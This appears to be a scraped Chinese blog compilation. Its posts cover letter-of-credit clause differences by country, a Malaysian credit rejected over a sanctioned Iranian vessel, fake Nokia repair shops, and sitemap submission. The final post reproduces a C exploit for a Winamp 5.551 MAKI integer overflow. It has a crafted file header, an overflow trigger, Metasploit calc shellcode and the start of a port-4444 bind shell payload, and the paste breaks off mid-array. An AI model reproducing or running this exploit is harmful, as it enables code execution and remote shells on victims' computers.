各国信用证条款特点和差异分析(一)

信用证经典教程,网上淘的。
来源:考试大,http://www.examda.com
一、港澳地区信用证条款特点
中国港澳地区的信用证,是指从香港和澳门地区开出的信用证,其条款有如下特点:
1.信用证常要求一套非议付单据寄给指定人的条款
例⑴:ONE SET OF NON-NEGOTIABLE COPIES OF SHIPPING DOCUMENTS HAS BEEN AIRMAILED DIRECT TO THE APPLICANT WITHIN TWO DAYS AFTER SHIPMENT.
翻译:一套非议付装运单据副本已经在装运后两天内直接邮寄给申请人。
分析:实务中,非议付装运单据(不包含正本提单)并无提取货物的权利,因而往往不能向银行交单押汇,之所以寄给申请人或其指定人是为了便于其提早安排接货及联系销售事宜。出口商只需按要求寄出即可。
2.信用证要求货物转运时提单需指出第二程船名的条款
例⑴:IF GOODS ARE SUBJECT TO TRANSHIPMENT, THE NAME OF THE ON-CARRYING VESSEL MUST BE SHOWN ON THE BILLS OF LADING.
翻译:如果货物打算转运,则第二程船名必须在提单上注明。
分析:由于港澳地区所处的特殊地理位置,通常作为中国内陆地区与其它国家的中转港口,故货物大多为转口贸易,需要转船,对于开证人而言,为了便于及时和准确掌握货物运输动向,往往要求在第一程运输提单上加注第二程船名。对此,出口商应注意满足这一条件。
3. 信用证要求货物转运时,需投保有关转运险种的条款
例⑴:IF GOODS ARE SUBJECT TO TRANSHIPMENT, INSURANCE POLICY or CERTIFICATE MUST STATE THAT THE RISKS OF LOSS AND/ or DAMAGE DUE TO TRANSHIPMENT HAVE BEEN INCLUDED.
翻译:假如货物将要转运的话,保险单或保险凭证必须注明转运丢失险或损害险已被包括在内。
分析:这条款主要是申请人担心货物经港澳地区转运时出现损失而作的规定,出口商可在出口货物时提醒保险公司在保单上加注这一条款。
二、亚洲其它国家信用证条款特点
亚洲其它国家的信用证,是指除港澳地区外的其它亚洲国家(如日本、南韩、新、马、泰、越南等)的信用证,其条款有如下特点:
1.信用证规定不得电索的条款
例⑴:T.T. REIMBURSEMENT IS NOT ACCEPTABLE.
翻译:不接受电索条款。
分析:电索条款是指议付行议付单据后可立即以电报或电传等电讯方式向开证行或其指定偿付行收取货款的条款。若信用证明确规定不得电索,则只能通过邮寄方式索汇,收款相对较慢。上述条款常见于日本来证,目的是想推迟付款,可见其商人之精明。对出口商而言,为加快收汇,大额货款应争取电索。
2.信用证指定运输公司的条款
例⑴:SHIPMENT SHOULD BE EFFECTED BY CHINA OCEAN SHIPPING AGENCY(PENAVICO) BEIHAI BRANCH OFFICE ONLY.
翻译:只准中国远洋运输公司北海分公司装运。
分析:指定运输公司条款是指信用证规定由某一运输公司装运货物的条款。这条款主要见于南韩来证。一般而言,信用证是不指定运输公司的,但有些国家出于本国政治、外交情况或货物运输安全考虑,往往会有这一要求。对此,出口商应注意执行。
3.信用证指定偿付行的条款
例⑴:IN REIMBURSEMENT, NEGOTIATING BANK IS TO DRAW SIGHT DRAFTS ON UNITED OVERSEAS BANK LTD.,  
130 LIBERTY STREET, SUITE 2712, NEW YORK, N.Y. 10006, USA
AND CERTIFY TO US THAT ALL TERMS & CONDITIONS OF THIS CREDIT HAVE BEEN COMPLIED WITH .  
翻译:索汇时,议付行请出具以美国纽约华联银行为付款行的即期汇票,且向我行证实:所有本证条款已经相符。
分析:指定偿付行条款是指信用证中规定通过某偿付行偿付货款的条款。这条款主要见于新加坡来证,指定其在纽约的偿付行,有利于及时清偿货款。出口方银行可利用这一条款快速索汇。
4.信用证要求特定快递收据的条款
例⑴:RECEIPT OF DHL SHOWING THAT ONE SET OF NON-NEGOTIABLE  DOCUMENT PLUS 1/3 orIGINAL B/L HAS BEEN SENT TO KING BRIGHT CO. LTD. CENTRAL, HONG KONG (TRANSFEROR) BY DHL WITHIN 2 DAYS AFTER SHIPMENT DATE.
翻译:敦豪国际快递收据,显示一套非议付单据加上三份正本提单之一份已经在装运日后两天内直接寄给香港明君有限公司(转让人)。
分析:特定快递收据条款是指信用证规定单据由某指定快递公司寄出且需提交收据之条款。这条款常见于越南来证。香港商人作为中间商(即转让人),通过可转让信用证收取中介费用,故要求一份正本提单寄给转让人。但这一条款显然不利于出口商。故出口商只有十分了解转让人且确有把握做到单证相符时方可接受。
5.信用证要求装运使用规则航班的条款
例⑴:SHIPMENT MUST BE MADE IN REGULAR LINER VESSEL AND A CERTIFICATE TO THIS EFFECT MUST ACCOMPANY THE DOCUMENTS FOR NEGOTIATION.
翻译:必须以规则航班装运,对此结果的证明书必须随付单据议付。
分析:规则航班条款是指信用证规定装运使用班轮的条款。这条款主要见于孟加拉来证。因进口商担心货物由其它船只运输会带来风险,故指定规则航班。出口商可根据当地运输情况预定航班。
6.信用证要求装运使用特定船只的条款
例⑴:GOODS MUST BE SHIPPED IN SEA WORTHLY CONFERENCE VESSEL WHICH SHOULD BE ON APPROVED LIST OF THE LLOYDS.
翻译:货物必须以劳埃德船泊协会获准表上且适于深海运输的船只装运。
分析:特定船只条款是指信用证规定采用指定船只运输的条款。这条款主要见于印度来证。进口商为了保障货物运输安全,在信用证中列入这一条款。对此,出口商应注意本地是否有合乎条件的船只,若无,则需联系修改。
7.信用证要求标明汇率条件的条款
例⑴:BENEFICIARY’S MANUALLY SIGNED DRAFTS AT SIGHT ON ABOVE NAMED IMPORTERS FOR FULL INVOICE VALUE BEARING CLAUSE "PAYABLE AT BANK’S CURRENT SELLING RATE OF EXCHANGE ALONGWITH MARK-UP AT RATE PREVAILING IN PAKISTAN" & orIGIANL INVOICES NOT EXCEEDING THIS CREDIT AMOUNT, PREPARED IN THE NAME OF IMPORTERS, IN OCTUPLICATE CERTIFYING MERCHANDISE TO BE OF orIGIN OF .
翻译:受益人按发票全值出具以上述进口商为付款人之手签汇票,标明条款:“可按现行银行卖出
汇率以及巴基斯坦市场优惠利率支付”,而且正式发票以进口商为抬头,不超出本证金额,一式十份,证实货物产地。
分析:标明汇率条件条款是指信用证规定单据(一般在发票或汇票上)加注汇率条件的条款。这条款主要见于巴基斯坦来证。进口商或进口方银行为了防范汇率风险,事先确定这一条款。出口商制单时必须注意在汇票上加注这一汇率条款。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/international-trade/194

马来西亚信用证交单纪事–美英资银行信用证下交易参与方注意事项

      这一票货是我们和马来西亚客户的第四单信用证付款交易,前三次出货一切顺利,这一次却遇到了一点波折。就把它写出来和大家分享一下。
      从出提单开始吧,这次货代给我找的货代非常垃圾,因为一开始客户主张用指定货代,我为了在提单上节省时间就尽量争取使用我们自己的货代,结果把海运费压得很低。接连让我出了4张保函,而且全部都需要盖公章,要求非常过分。提单不显示consignee联系方式要出保函;不显示HS编码要保函;出船证明要保函;船公司代理自己看错了提单确认件要重新签发提单也要我们出保函。最让我无语的是最后一条,平时提单都是用传真用笔修改确认直至发送OK件给货代完成最终确认。这一票货我直接把所有需要改的地方做成word文档通过货代发给船公司,船公司居然就能少打一句,佩服他们操作的水平。
      等提单在5月23重新签出来并寄到手上(周六)我立即赶在最近的银行工作日(星期一)25号把正本信用证通知和交单资料交单给银行的信用证部。而且特别关照审单的小姐当天就是交单截止日期,同时也是信用证失效期。让她最好当天就出单,最晚第二天要出单。这里可能有人会问如果在第二天出单不就无效了吗,之前在发现提单错误计划重新签发时就问过银行,银行说开证行审查出单期不以实际邮寄出单时间为准,而是以通知行(议付行)在信用证上标注的出单日期为准,也就是说信用证出单日期和House提单一样可以倒签。后来银行就是在第二天给我出的单(问银行不同的人,一个人说是25号当天出的,另一个人说是第二天26号出的,中行信用证部内部管理还是有点混乱)。到了第三天客户问我出单单号,因为马来西亚渣打银行(开证行)仍未收到交单资料,我就去问我们的银行,问到单号以后到DHL的官网一查傻了,显示快递是4月份寄出并签收,而发件地为台湾,快件目的地为斯里兰卡。又重新打电话给DHL确认,仍然是这个结果,就在跟银行确认,确认之后也还是这个单号。反复解释之后DHL给出了解释:可能是重单了,也就是说两个快件用的同一个单号。真好笑,国内的快递都几乎从来没有重单的情况,DHL怎么会重单呢?把这个问题扔给银行,让他们跟DHL沟通解决,过了几个小时有了结果,的确是重单,再用那个快递单号到DHL官网一查,有了两个结果,需要先选择其中一个再能查看详细跟踪情况。能查到就好说了,就回复了客户并且做了说明。
      今天,客户的财务在MSN上跟我说银行不能把单据给他们,我一听觉得很奇怪,除非客户拒付否则银行怎么会不给单据呢,后来经过对方解释,实际情况是由于我们这票货从伊朗船公司走的,马来西亚渣打银行在经过审查之后最终拒绝了此份信用证,原因是渣打银行不接受伊朗船公司承运的单据。感觉极度费解,把信用证翻出来把相关条款自己又看了一遍仍然没有找出问题所在。只发现一条关于转运的条款,说船只不能挂靠一些国家其中包括伊朗,事前我已经让船公司做了船证明,按照这一条注明“HEREBY WE CERTIFY THAT THE VESSEL FROM SHANGHAI PORT, CHINA TO PASIR GUDANG, MALAYSIA, TRANSSHIPMENT, IF ANY, IS PROHIBITED THROUGH IRAN, CUBA, NORTH KOREA, SUDAN, SYRIA AND MYANMAR.” 又去问我们的银行,这时知道原因了,美资、英资银行对于这些国家在交易过程中出现非常敏感,具体来说就是这些银行开立的信用证在交易过程及货物运输过程中不能有伊朗、古巴、朝鲜、苏丹、叙利亚、缅甸这些受经济制裁国家任何公司及其他单位参与。这是一条信用证中的浅规则,虽然我们的提单没有显示“Iran”这个单词,马来西亚渣打还是认定船名"SAHAND"船籍为伊朗。据此马来西亚渣打将之视为不符点并拒绝接受这份信用证,并且拒绝我们的客户(开证人)接受这个不符点,且认定在信用证47B第三条中已经对此做出说明。
      渣打银行47B第三条具体内容如下:
SCB WILL NOT BE LIABLE IF IT or ANOTHER PERSON INVOLVED IN THIS TRANSACTION FAILS TO PERFORM THE TRANSACTION or DELAYS IT or DISCLOSES INFORMATION TO A REGULATOR or OTHER AUTHORITY AS A RESULT OF SANCTIONS REGULATION or THEIR OWN POLICY, or FOR ANY ACTION WHICH MAY BE TAKEN or REQUIRED BY A REGULATOR. IF IN DOUBT, BEFORE INVOLVING A SUSPECTED SANCTIONED PARTY, or A PARTY LOCATED IN A SANCTIONED COUNTRY YOU MAY CONTACT SCB FOR ADVICE, WHICH WILL BE BASED ON REGULATIONS AND THE BANK'S POLICY AT THE TIME OF ENQUIRY, IF WE AGREE, THE ABOVE PROVISION WILL STILL APPLY. EXAMPLES OF THE INVOLVEMENT OF A SANCTIONED PARTY MAY INCLUDE A TRADING PARTY, BUYER, SUPPLIER, CONSIGNEE or NOTIFY PARTY, BANK, SHIPPING COMPANY, AGENT, VESSEL, INSURANCE COMPANY, ASSIGNEE or TRANSFEREE, PRESENTATION PARTY, or PLACE OF orIGIN, LOADING, TRANSSHIPMENT, RECEIPT, DISCHARGE or FINAL DESTINATION OF GOODS. TRANSHIPMENT, IF ANY, IS PROHIBITED THROUGH IRAN, CUBA, NORTH KOREA, SUDAN, SYRIA AND MYANMAR.
      这一条款曾一直被我理解为只要在转运情况下船只不挂靠上述国家港口即可(出一个船证明即可),因为transhipment前面是一个句号,明显跟transhipment一句是两个独立语句。但今天才了解到不仅是转运限制,前面的“贸易方,买方,卖方,收货人或者通知方,银行,船公司,代理,船只,保险公司,委托人或者承让人,交单方,或者原产地,装货地,转运地,接收地,卸货港(地)或者目的地”都不得与伊朗,古巴,朝鲜,苏丹,叙利亚和缅甸发生联系,否则便会被美资和英资银行拒之门外。
      根据银行今天提供的一个方法,以后各位同行在信用证审单和选择船公司的时候需要格外留心提单上显示的船公司名称和船名。可以到美国财政部网站左侧的Specially Designated Nationals List (SDN)栏目下下载最新的SDN(特别指定国家清单),此份清单是由Office of Foreign Assets Control (OFAC)即美国财政部海外资产控制办公室制定的,名单中主要是OFAC认定为恐怖组织,跨国毒品、麻醉品交易、大规模杀伤性武器组织。SDN清单美国财政部下载页面:http://www.ustreas.gov/offices/enforcement/ofac/sdn/,有PDF和TXT两种文件格式可以下载,最近更新时间是2009.5.29。很不幸这一次到马来西亚货物承运的船名在这份SDN清单上有记录,虽然船公司在清单上没有记录,现在个人推断渣打银行很有可能并没有根据船名去查船籍,而是直接在SDN清单中比对。船名SAHAN
D在清单倒数第三页,应该是这两个月才添上去的。以后在遇到美资和英资银行信用证时,各位一定要尽量避免使用这些受经济制裁国家的船公司、船只、货代等;总之,在整个交易过程中不得有以上国家参与,以免开证行审单时造成不必要的麻烦。
      这次事情最终跟客户协商改用T/T付款,通知开证行将交单资料原路退回到我们银行,再退到公司,而后再邮寄给客户清关提货,预计在下周全部完成。
      通过这件事情,再次发现自己的信用证知识需要进一步完善,如果早先对信用证的相关条款和规则了解的更透彻一些的话,这件事就不会发生了。
      反思,学习。。。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/international-trade/195

当品牌售后遭遇山寨

      昨天自己的6300手机出了点小问题拿到售后检测时,发现一个有趣的现象。先是在诺基亚正规售后的隔壁就有一家xx手机经营部打着维修诺基亚专修的招牌;走进诺基亚售后一看,在靠门的地方有一个醒目的提示牌。立即想到了一墙之隔的xx手机经营部。

诺基亚售后提示牌

      诺基亚售后服务中心大厅门边的提示牌(图中具体市名经处理,被隐去)

正规售后与山寨售后

      “正规军”与“山寨军”,“山寨军”的的外墙上,玻璃门上,柜台上贴满了“专修诺基亚“字样的标牌。

      首先是感觉到好笑,因为就在这条路不远的地方就是本地的行政管理局,管理局大门上硕大的横幅印的是“打假维权请拨12315”。然后是反思,个人总结原因主要有两点:1,国民的维权意识和版权意识仍然不够,这一点在"暴风事件"上也有所体现;2,诺基亚的配件、过保维修价格实在太高,这一点想必是所有去过诺基亚售后服务中心的人都会有的体会。
      把眼光放广,不止是诺基亚,甚至很多电脑厂商也遇到了这样的问题,在中关村一条品牌机售后云集的路上,随处可见如上图一样的山寨售后,有的甚至连招牌都模仿品牌机售后的。为什么?主要就是因为品牌机的配件和维修成本太高,在同样能修好的前提下普通消费者显然更愿意去便宜的地方,哪怕是山寨军。因为现在电子产品的销售价格都已经相当透明,销售暴利时代已经过去,但是这些厂家随后就发现了新的利润增长点–售后服务,用高价甚至是天价售后来平衡售前的利润差额。
      厂商正规售后和山寨售后的竞争,其实就是品牌厂商与普通消费者之间的博弈。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/other/196

网站地图(sitemap)简介,制作与提交

      对于各位站长而言sitemap一定不是一个陌生的概念,作为一个成熟的网站网站地图(sitemap)无疑是必不可少的内容。
      网站地图根据针对对象不同可以分为两种:
      针对网站访客–针对网站访客的网站地图多半在网站导航栏会有链接标志,访客可以点击浏览,作用于现实中的地图类似,主要用于为访客提供网站导航,尽量把网站的功能结构和服务内容富有条理地列出来,方便访问。文件类型通常为html格式;通常由网站控制面板(后台)直接生成。
      针对搜索引擎–针对搜索引擎的网站地图不会在网站页面上显示,作用是为了方便搜索引擎抓取、分析网站所有链接,一般包含几乎全部的网站内部链接。文件类型通常为xml格式(根据需要提交到的搜索引擎不同而不同),通常放置于网站根目录下,文件名为sitemap,例如:http://www.0point.cn/sitemap.xml;通常由专业的工具生成,也可选择在线生成。
      现在来说一下后者针对即搜索引擎sitemap地图的生成,常用的生成工具有:SiteMapBuilder,SiteMapGenerator;国内也有很多sitemap制作生成工具,比较优秀的如老虎sitemap生成器。针对静态网页并且采用分级目录的情况,个人推荐老虎sitemap生成器,个头小巧,设置功能全面,最重要的是能有效过滤一般sitemap工具中出现的重复目录。pjblog全静态下实际使用效果非常好。
      如果你认为使用软件过于繁琐,而且你的网站规模不是很大,可以试试sitemap在线生成:http://www.xml-sitemaps.com/,只需短短四步加上一点耐心的等待,不久你的网站地图就呈现在眼前了,而且可以将生成好的地图下载到本地,非常人性化。
      在网站地图制作完毕之后,要做的就是提交了,几大常见搜索引擎网站地图提交地址:
Google: https://www.google.com/webmasters/tools/login?hl=zh_CN
Google同时支持在线URL提交,地址:http://www.google.com/webmasters/sitemaps/ping?sitemap=http://your.domainnames/sitemap.xml
Yahoo:  http://sitemap.cn.yahoo.com/mysites
百度暂时还不支持sitemap提交,非常遗憾。

相关知识&链接:
      1,提交给搜索引擎的sitemap文件网址数不得多于5000,如果多于5000,可以采用多个文件分次提交的方式。
      2,Google Sitemap 错误和警告及解决办法

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/pc-tech/197

Winamp 5.551 MAKI分析整数溢出漏洞

Winamp 5.551 MAKI分析整数溢出漏洞

复制内容到剪贴板程序代码程序代码
/**************************************************************
Winamp 5.551 MAKI Parsing Integer Overflow Exploit !!!

Tested on :Vista sp1 and Xpsp3
Release Date :May 22 2009
Venders web site :http://www.winamp.com/
Version Tested:Winamp 5.551
Not vulnerable :Winamp 5.552

Credits to Monica Sojeong Hong down at vrt-sourcefire for the overflow.
http://vrt-sourcefire.blogspot.com

As we know we are able to overwrite the exception handlers so
we can exploit this on multiple OS i tested these on xpsp3 <eng>
<Vista sp1> And all worked fine.

I wrote the exploits because i had tried the 2 exploits posted
on milw0rm they were tested on winxp sp3 and vista sp1 and i couldn't
get them to execute shell code which prompted me into writing my
own version!!

Below i have provided a look into the disassembly of the new
changes in the 555.2 version of winamp the main change was in
gen_ff.dll.

—snip–

A quick look at the new gen_ff.dll.
———————————-
loc_12094F62:
mov     ax, [ebx]
movzx   edi, ax       -Extends ax into edi register.-
inc     ebx
push    edi             ; Size
inc     ebx
lea     eax, [ebp+MultiByteStr]
push    ebx             ; Src
push    eax             ; Dst
call    memmove
————————
loc_120951E9:
mov     edi, [ebx]
add     ebx, 4
mov     ax, [ebx]
movzx   esi, ax        -Extends ax into esi register.-
inc     ebx
push    esi             ; Size
inc     ebx
lea     eax, [ebp+var_2014C]  <– This was also changed.
push    ebx             ; Src
push    eax             ; Dst
call    memmove

This is a simple run down of the new patch
that was applied to winamp winamp 5.552 If we look closely we can see they
changed the sign extension.

=555.1 .dll=
———-
movsx esi, ax  = movsx(dest , source );
Copies source operand dest and extends the value.

Changed in the new gen_ff.dll.
=555.2 .dll=
———-
movzx esi, ax

Zero extend the 8 bit registers.
Copies data and sign extends the data while copying it.

Destination= 16 – 32 bit.
Source =     8 or a 16byte or maybe even 1 byte of memory
Source =     the destination must be of greater value than the source.

This was a few of the changes within the new dll from winamp.Im
sure if you want to dig deeper you can get both dll and compare them
to see the changes that are made.So basically they have changed the
instruction from Copy with sign extension to copy with zero extension.

This can also be displayed when looking at the stack at the time of the
exception in the new version of winamp after steeping through the exception
although we can cause and exception we cant overwrite the 4 bytes on the
stack we can only overwrite 2 and it is always capped with 00FF.

—snip–

Special thanks to str0ke 🙂

Credits to n00b for writing exploit code !!
Progression is always a good thing.
———-
Disclaimer
———-
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!

***************************************************************/

#include <stdio.h>
#define MAKI "mcvcore.maki"

unsigned char First_Header[] =
{
    0x46, 0x47, 0x03, 0x04, 0x17, 0x00, 0x00, 0x00, 0x2A, 0x00, 0x00, 0x00,
    0x71, 0x49, 0x65, 0x51, 0x87, 0x0D, 0x51, 0x4A, 0x91, 0xE3, 0xA6, 0xB5,
    0x32, 0x35, 0xF3, 0xE7, 0x64, 0x0F, 0xF5, 0xD6, 0xFA, 0x93, 0xB7, 0x49,
    0x93, 0xF1, 0xBA, 0x66, 0xEF, 0xAE, 0x3E, 0x98, 0x7B, 0xC4, 0x0D, 0xE9,
    0x0D, 0x84, 0xE7, 0x4A, 0xB0, 0x2C, 0x04, 0x0B, 0xD2, 0x75, 0xF7, 0xFC,
    0xB5, 0x3A, 0x02, 0xB2, 0x4D, 0x43, 0xA1, 0x4B, 0xBE, 0xAE, 0x59, 0x63,
    0x75, 0x03, 0xF3, 0xC6, 0x78, 0x57, 0xC6, 0x87, 0x43, 0xE7, 0xFE, 0x49,
    0x85, 0xF9, 0x09, 0xCC, 0x53, 0x2A, 0xFD, 0x56, 0x65, 0x36, 0x60, 0x38,
    0x1B, 0x46, 0xA7, 0x42, 0xAA, 0x75, 0xD8, 0x3F, 0x66, 0x67, 0xBF, 0x73,
    0xF4, 0x7A, 0x78, 0xF4, 0xBB, 0xB2, 0xF7, 0x4E, 0x9C, 0xFB, 0xE7, 0x4B,
    0xA9, 0xBE, 0xA8, 0x8D, 0x02, 0x0C, 0x37, 0x3A, 0xBF, 0x3C, 0x9F, 0x43,
    0x84, 0xF1, 0x86, 0x88, 0x5B, 0xCF, 0x1E, 0x36, 0xB6, 0x5B, 0x0C, 0x5D,
    0xE1, 0x7D, 0x1F, 0x4B, 0xA7, 0x0F, 0x8D, 0x16, 0x59, 0x94, 0x19, 0x41,
    0x99, 0xE1, 0xE3, 0x4E, 0x36, 0xC6, 0xEC, 0x4B, 0x97, 0xCD, 0x78, 0xBC,
    0x9C, 0x86, 0x28, 0xB0, 0xE5, 0x95, 0xBE, 0x45, 0x72, 0x20, 0x91, 0x41,
    0x93, 0x5C, 0xBB, 0x5F, 0xF9, 0xF1, 0x17, 0xFD, 0x4E, 0x6D, 0x90, 0x60,
    0x7E, 0x53, 0x2E, 0x48, 0xB0, 0x04, 0xCC, 0x94, 0x61, 0x88, 0x56, 0x72,
    0xC0, 0xBC, 0x3A, 0x40, 0x22, 0x6F, 0xD6, 0x4B, 0x8B, 0xA4, 0x10, 0xC8,
    0x29, 0x93, 0x25, 0x47, 0x4D, 0x3E, 0xAA, 0x97, 0xD0, 0xF4, 0xA8, 0x4F,
    0x81, 0x7B, 0x0D, 0x0A, 0xF2, 0x2A, 0x45, 0x49, 0x83, 0xFA, 0xBB, 0xE4,
    0x64, 0xF4, 0x81, 0xD9, 0x49, 0xB0, 0xC0, 0xA8, 0x5B, 0x2E, 0xC3, 0xBC,
    0xFD, 0x3F, 0x5E, 0xB6, 0x62, 0x5E, 0x37, 0x8D, 0x40, 0x8D, 0xEA, 0x76,
    0x81, 0x4A, 0xB9, 0x1B, 0x77, 0xBE, 0x97, 0x4F, 0xCE, 0xB0, 0x77, 0x19,
    0x4E, 0x99, 0x56, 0xD4, 0x98, 0x33, 0xC9, 0x6C, 0x27, 0x0D, 0x20, 0xC2,
    0xA8, 0xEB, 0x51, 0x2A, 0x4B, 0xBA, 0x7F, 0x5D, 0x4B, 0xC6, 0x5D, 0x4C,
    0x71, 0x38, 0xBA, 0x1E, 0x8D, 0x9E, 0x48, 0x3E, 0x48, 0xB9, 0x60, 0x8D,
    0x1F, 0x43, 0xC5, 0xC4, 0x05, 0x40, 0xC9, 0x08, 0x0F, 0x39, 0xAF, 0x23,
    0x4B, 0x80, 0xF3, 0xB8, 0xC4, 0x8F, 0x7E, 0xBB, 0x59, 0x72, 0x86, 0xAA,
    0xEF, 0x0E, 0x31, 0xFA, 0x41, 0xB7, 0xDC, 0x85, 0xA9, 0x52, 0x5B, 0xCB,
    0x4B, 0x44, 0x32, 0xFD, 0x7D, 0x51, 0
x37, 0x7C, 0x4E, 0xBF, 0x40, 0x82,
    0xAE, 0x5F, 0x3A, 0xDC, 0x33, 0x15, 0xFA, 0xB9, 0x5A, 0x7D, 0x9A, 0x57,
    0x45, 0xAB, 0xC8, 0x65, 0x57, 0xA6, 0xC6, 0x7C, 0xA9, 0xCD, 0xDD, 0x8E,
    0x69, 0x1E, 0x8F, 0xEC, 0x4F, 0x9B, 0x12, 0xF9, 0x44, 0xF9, 0x09, 0xFF,
    0x45, 0x27, 0xCD, 0x64, 0x6B, 0x26, 0x5A, 0x4B, 0x4C, 0x8C, 0x59, 0xE6,
    0xA7, 0x0C, 0xF6, 0x49, 0x3A, 0xE4, 0x05, 0xCB, 0x6D, 0xC4, 0x8A, 0xC2,
    0x48, 0xB1, 0x93, 0x49, 0xF0, 0x91, 0x0E, 0xF5, 0x4A, 0xFF, 0xCF, 0xDC,
    0xB4, 0xFE, 0x81, 0xCC, 0x4B, 0x96, 0x1B, 0x72, 0x0F, 0xD5, 0xBE, 0x0F,
    0xFF, 0xE1, 0x8C, 0xE2, 0x01, 0x59, 0xB0, 0xD5, 0x11, 0x97, 0x9F, 0xE4,
    0xDE, 0x6F, 0x51, 0x76, 0x0D, 0x0A, 0xBD, 0xF8, 0xF0, 0x80, 0xA5, 0x1B,
    0xA6, 0x42, 0xA0, 0x93, 0x32, 0x36, 0xA0, 0x0C, 0x8D, 0x4A, 0x1B, 0x34,
    0x2E, 0x9B, 0x98, 0x6C, 0xFA, 0x40, 0x8B, 0x85, 0x0C, 0x1B, 0x6E, 0xE8,
    0x94, 0x05, 0x71, 0x9B, 0xD5, 0x36, 0xFD, 0x03, 0xF8, 0x4A, 0x97, 0x95,
    0x05, 0x02, 0xB7, 0xDB, 0x26, 0x7A, 0x10, 0xF2, 0xD5, 0x7F, 0xC4, 0xAC,
    0xDF, 0x48, 0xA6, 0xA0, 0x54, 0x51, 0x57, 0x6C, 0xDC, 0x76, 0x35, 0xA5,
    0xBA, 0xB5, 0xB3, 0x05, 0xCB, 0x4D, 0xAD, 0xC1, 0xE6, 0x18, 0xD2, 0x8F,
    0x68, 0x96, 0xC1, 0xFE, 0x29, 0x61, 0xB7, 0xDA, 0x51, 0x4D, 0x91, 0x65,
    0x01, 0xCA, 0x0C, 0x1B, 0x70, 0xDB, 0xF7, 0x14, 0x95, 0xD5, 0x36, 0xED,
    0xE8, 0x45, 0x98, 0x0F, 0x3F, 0x4E, 0xA0, 0x52, 0x2C, 0xD9, 0x82, 0x4B,
    0x3B, 0x9B, 0x7A, 0x66, 0x0E, 0x42, 0x8F, 0xFC, 0x79, 0x41, 0x15, 0x80,
    0x9C, 0x02, 0x99, 0x31, 0xED, 0xC7, 0x19, 0x53, 0x98, 0x47, 0x98, 0x63,
    0x60, 0xB1, 0x5A, 0x29, 0x8C, 0xAA, 0x4D, 0xC1, 0xBB, 0xE2, 0xF6, 0x84,
    0x73, 0x41, 0xBD, 0xB3, 0xB2, 0xEB, 0x2F, 0x66, 0x55, 0x50, 0x94, 0x05,
    0xC0, 0x73, 0x1F, 0x96, 0x1B, 0x40, 0x9B, 0x1B, 0x67, 0x24, 0x27, 0xAC,
    0x41, 0x65, 0x22, 0xBA, 0x3D, 0x59, 0x77, 0xD0, 0x76, 0x49, 0xB9, 0x52,
    0xF4, 0x71, 0x36, 0x55, 0x40, 0x0B, 0x82, 0x02, 0x03, 0xD4, 0xAB, 0x3A,
    0x87, 0x4D, 0x87, 0x8D, 0x12, 0x32, 0x6F, 0xAD, 0xFC, 0xD5, 0x83, 0xC2,
    0xDE, 0x24, 0x6E, 0xB7, 0x36, 0x4A, 0x8C, 0xCC, 0x9E, 0x24, 0xC4, 0x6B,
    0x6C, 0x73, 0x37, 0x00
};

/*Trigger the Integer overflow*/
unsigned char Exception [] =
{
    0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
    0xFF, 0xFF, 0xFF
};

/* win32_exec –  EXITFUNC=seh CMD=Calc Size=343
Encoder=PexAlphaNum http://metasploit.com */

char Calc_ShellCode [] =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
    "\x42\x50\x42\x30\x42\x50\x4b\x58\x45\x34\x4e\x43\x4b\x48\x4e\x37"
    "\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x34\x4a\x41\x4b\x58"
    "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x43\x4b\x38"
    "\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c"
    "\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
    "\x46\x4f\x4b\x43\x46\x55\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x48"
    "\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x30\x4b\x54"
    "\x4b\x58\x4f\x35\x4e\x51\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58"
    "\x41\x30\x4b\x4e\x49\x58\x4e\x55\x46\x52\x46\x50\x43\x4c\x41\x43"
    "\x42\x4c\x46\x46\x4b\x38\x42\x54\x42\x33\x45\x38\x42\x4c\x4a\x57"
    "\x4e\x50\x4b\x58\x42\x54\x4e\x50\x4b\x48\x42\x37\x4e\x31\x4d\x4a"
    "\x4b\x48\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b"
    "\x42\x30\x42\x50\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x45\x41\x33"
    "\x48\x4f\x42\x46\x48\x35\x49\x48\x4a\x4f\x43\x38\x42\x4c\x4b\x57"
    "\x42\x35\x4a\x56\x42\x4f\x4c\x38\x46\x50\x4f\x55\x4a\x46\x4a\x49"
    "\x50\x4f\x4c\x48\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x34\x41\x36"
    "\x4e\x46\x43\x36\x42\x50\x5a";

/* win32_bind –  EXITFUNC=seh LPORT=4444 Size=709
Encoder=PexAlphaNum http://metasploit.com */

char Bind_Shellcode [] =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
